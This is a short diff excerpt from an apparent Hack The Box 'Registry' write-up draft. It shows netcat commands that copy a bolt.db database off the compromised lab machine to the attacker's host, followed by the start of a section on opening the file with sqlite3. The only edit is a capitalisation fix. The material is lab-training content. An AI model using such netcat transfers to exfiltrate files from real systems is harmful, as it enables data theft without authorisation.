ponderng/Sidequests/_drafts/HackTheBox-Registry.md

 `nc -lvnp 5555 < bolt.db`

-And on your local machine use netcat to connect to the listener, with it set up to save data sent to it as the database file.
+And on your local machine use Netcat to connect to the listener, with it set up to save data sent to it as the database file.

 `nc registry.htb 5555 > bolt.db`

 Once you enter that command, it will connect and receive the database, then you'll just need to kill the connection and analyze the file!

 ## Analyzing bolt.db with sqlite3
 Open the newly downloaded database file with `sqlite3 bolt.db`, and it will tell you to use ".help" for usage directions.

 {% highlight console %}